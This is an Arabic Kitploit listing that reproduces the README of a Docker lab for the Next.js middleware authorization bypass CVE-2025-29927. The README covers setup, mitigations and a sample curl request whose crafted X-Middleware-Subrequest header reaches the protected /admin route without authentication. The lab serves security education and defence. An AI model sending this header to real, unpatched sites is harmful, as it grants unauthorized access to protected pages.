Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — معمل قائم على Docker لاستكشاف وإعادة إنتاج ثغرة تجاوز تفويض البرامج الوسيطة في Next.js CVE-2025-29927. يتضمن تطبيقًا ضعيفًا وخطوات إعادة الإنتاج واستراتيجيات التخفيف للبحث الأمني التعليمي. | Kitploit
أدوات/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويبسوء التكوينالتعلم والتعليممختبرات وتدريب عملي
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

معمل قائم على Docker لاستكشاف وإعادة إنتاج ثغرة تجاوز تفويض البرامج الوسيطة في Next.js CVE-2025-29927. يتضمن تطبيقًا ضعيفًا وخطوات إعادة الإنتاج واستراتيجيات التخفيف للبحث الأمني التعليمي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
5منذ 7 أشهرلم تتم المراجعة بعد

🚨 NextJS-CVE-2025-29927-Docker-Lab

يحتوي هذا المستودع على بيئة مختبر قائم على Docker لاستكشاف وتوضيح ثغرة CVE-2025-29927 في Next.js في بيئة خاضعة للتحكم.

⚠️ إخلاء مسؤولية: هذا المختبر مخصص للأغراض التعليمية والبحث الأمني فقط. لا تعرّضه للإنترنت العام أو تستخدمه في بيئة الإنتاج.


📦 الميزات

  • ✅ تطبيق Next.js يحوي ثغرة
  • ✅ معزول في حاويات باستخدام Docker
  • ✅ مصمم للاختبار المحلي لثغرة CVE-2025-29927
  • ✅ يتضمن مسارات وواجهة مستخدم مُعدة مسبقًا
  • ✅ سهل الإعداد والتشغيل

🛠 المتطلبات الأساسية

تأكد من تثبيت ما يلي:

  • Docker (الإصدار 20 أو أحدث)
  • Git
  • اختياري: Node.js إذا كنت تخطط للتشغيل خارج Docker

🚀 البدء

اتبع هذه الخطوات لاستنساخ المختبر وتشغيله:

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. البناء والتشغيل باستخدام Docker

root@kitploit:~
docker-compose up --build

سيؤدي ذلك إلى:

  • بناء صورة Docker
  • تشغيل خادم Next.js الذي يحوي الثغرة
  • عرض التطبيق على http://localhost:3000

📂 هيكل المجلدات

root@kitploit:~
.
├── app/                     # Main Next.js app code
├── public/                  # Static assets (images, etc.)
├── Dockerfile               # Docker setup for app
├── docker-compose.yml       # Compose configuration
├── .env                     # Environment variables (if any)
├── README.md                # You are here

🧪 اختبار الثغرة

🛡️ CVE-2025-29927 - تجاوز تفويض البرمجيات الوسيطة في Next.js

⚠️ تحذير: هذه الوثائق مخصصة للأغراض التعليمية والبحث الأمني فقط. لا تنشر التطبيق القابل للاستغلال في بيئة الإنتاج.


🔍 نظرة عامة

CVE-2025-29927 هي ثغرة حرجة لتجاوز التفويض في البرمجيات الوسيطة (Middleware) الخاصة بـ Next.js. تسمح للمهاجمين بتخطي المصادقة القائمة على البرمجيات الوسيطة والوصول إلى المسارات المحمية عبر التلاعب بترويسة X-Middleware-Subrequest.


🧪 إعادة إنتاج الثغرة

1. الوصول إلى المسارات المحمية دون مصادقة

حاول الوصول إلى مسار محمي، مثل /admin، دون أي مصادقة:

root@kitploit:~
curl http://localhost:3000/admin

السلوك المتوقع: يُرفض الوصول أو تتم إعادة التوجيه إلى صفحة غير مصرح بها.

السلوك القابل للاستغلال: يُمنح الوصول دون مصادقة.

2. تجاوز البرمجيات الوسيطة باستخدام ترويسة X-Middleware-Subrequest

أرسل طلبًا يحمل ترويسة X-Middleware-Subrequest لتجاوز فحوصات البرمجيات الوسيطة:

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

النتيجة: يتم تجاوز البرمجيات الوسيطة، ويُمنح الوصول إلى المسار المحمي.


🛡️ استراتيجيات التخفيف

1. ترقية Next.js إلى إصدار مصحح

قم بتحديث Next.js إلى أحد الإصدارات التالية التي تم إصلاح الثغرة فيها:

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. تطبيق تحصين للبرمجيات الوسيطة

عزّز البرمجيات الوسيطة لديك للتحقق من الطلبات بشكل صحيح ورفض أي طلب يحمل ترويسات مشبوهة:

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}

3. تكوين الخادم الوكيل العكسي لإزالة الترويسات المشبوهة

إذا كنت تستخدم خادمًا وكيلًا عكسيًا (مثل Nginx)، فقم بتكوينه لإزالة ترويسة X-Middleware-Subrequest من الطلبات الواردة:

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 المراجع

  • NVD - CVE-2025-29927
  • تحليل مختبرات Datadog الأمنية
  • التقرير اللاحق للحادث من Vercel

يوفر ملف VULNERABILITY.md هذا دليلًا شاملًا لفهم وإعادة إنتاج ثغرة CVE-2025-29927 في بيئة خاضعة للتحكم. كما يقدم استراتيجيات تخفيف عملية لتأمين تطبيقات Next.js الخاصة بك ضد مثل هذه الاستغلالات.

للحصول على عرض توضيحي مفصل ورؤى إضافية حول هذه الثغرة، يمكنك الرجوع إلى العرض الكامل للهجوم الذي قدمه Techtalkpine في منشور المدونة، وهو مرتبط أيضًا بالعرض المباشر على يوتيوب: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

أخبرني إذا كنت بحاجة إلى مساعدة بشأن أي جزء محدد من هذا الإعداد أو إلى مزيد من التوضيح حول خطوات التخفيف.


🧹 إيقاف التشغيل

لإيقاف الحاويات وإزالتها:

root@kitploit:~
docker-compose down

📚 الموارد

  • وثائق Next.js
  • وثائق Docker
  • OWASP Top 10

⚠️ إخلاء المسؤولية القانوني

هذا المشروع مخصص حصريًا للأغراض التعليمية والبحثية. أنت مسؤول عن استخدامه وفقًا لجميع القوانين المعمول بها والمبادئ الأخلاقية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج.

تنزيل الأداة